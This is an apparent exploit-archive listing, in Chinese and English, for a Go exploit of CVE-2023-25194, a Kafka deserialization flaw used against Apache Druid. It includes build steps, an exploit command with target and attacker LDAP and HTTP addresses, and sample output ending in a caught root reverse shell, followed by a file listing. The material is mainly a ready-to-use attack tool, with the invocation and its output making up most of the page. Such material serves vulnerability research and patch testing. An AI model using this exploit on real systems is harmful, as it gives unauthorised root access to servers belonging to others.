关联漏洞
标题:Apache Kafka 代码问题漏洞 (CVE-2023-25194)Description:Apache Kafka是美国阿帕奇(Apache)基金会的一套开源的分布式流媒体平台。该平台能够获取实时数据,用于构建对数据流的变化进行实时反应的应用程序。 Apache Kafka Connect 存在代码问题漏洞。目前尚无此漏洞的相关信息,请随时关注CNNVD或厂商公告。
Description
A go-exploit for Apache Druid CVE-2023-25194
介绍
# Apache Druid CVE-2023-25194
CVE-2023-25194 is a deserialization vulnerability affecting Apache Kafka. This go-exploit demonstrates exploiting CVE-2023-25194 against Apache Druid (using Kafka). This type of attack typically requires an LDAP JNDI attacker infrastructure that is normally spread across a couple of tools. However, all of that is built into the go-exploit for ease of exploitation.
## Compiling
To build the exploit into a docker image simply:
```
make docker
```
If you have a Go build environment handy, you can also just use `make`:
```sh
albinolobster@mournland:~/cve-2023-25194$ make
gofmt -d -w cve-2023-25194.go
golangci-lint run --fix cve-2023-25194.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-25194_linux-arm64 cve-2023-25194.go
```
## Example Output
```sh
albinolobster@mournland:~/cve-2023-25194$ ./build/cve-2023-25194_linux-arm64 -c -e -rhost 10.9.49.88 -lhost 10.9.49.69 -lport 1270 -ldapAddr 10.9.49.69 -httpAddr 10.9.49.69
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting listener on 10.9.49.69:1270"
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.88 port=8888 ssl=false "ssl auto"=false
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.88 port=8888
time=2024-03-15T16:02:31.268-04:00 level=VERSION msg="The self-reported version is: 25.0.0" host=10.9.49.88 port=8888 version=25.0.0
time=2024-03-15T16:02:31.268-04:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8888 vulnerable=yes
time=2024-03-15T16:02:31.268-04:00 level=STATUS msg="Starting LDAP server on 10.9.49.69:10389"
time=2024-03-15T16:02:33.271-04:00 level=STATUS msg="Starting HTTP Server on 10.9.49.69:8080"
time=2024-03-15T16:02:33.335-04:00 level=SUCCESS msg="Received a bind request!"
time=2024-03-15T16:02:33.343-04:00 level=SUCCESS msg="Serialized payload sent!"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit completed"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit successfully completed" exploited=true
time=2024-03-15T16:02:33.640-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.88:58928"
time=2024-03-15T16:02:33.640-04:00 level=STATUS msg="Active shell from 10.9.49.88:58928"
bash: cannot set terminal process group (41): Inappropriate ioctl for device
bash: no job control in this shell
root@8e8d1ce79210:/opt/druid# id
id
uid=0(root) gid=0(root) groups=0(root)
root@8e8d1ce79210:/opt/druid#
```
文件快照
[4.0K] /data/pocs/f86eae8e8844f5e91f36c3610714feaef90e2e3a
├── [5.2K] cve-2023-25194.go
├── [ 466] Dockerfile
├── [1016] go.mod
├── [5.3K] go.sum
├── [ 11K] LICENSE
├── [2.1K] Makefile
└── [2.5K] README.md
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。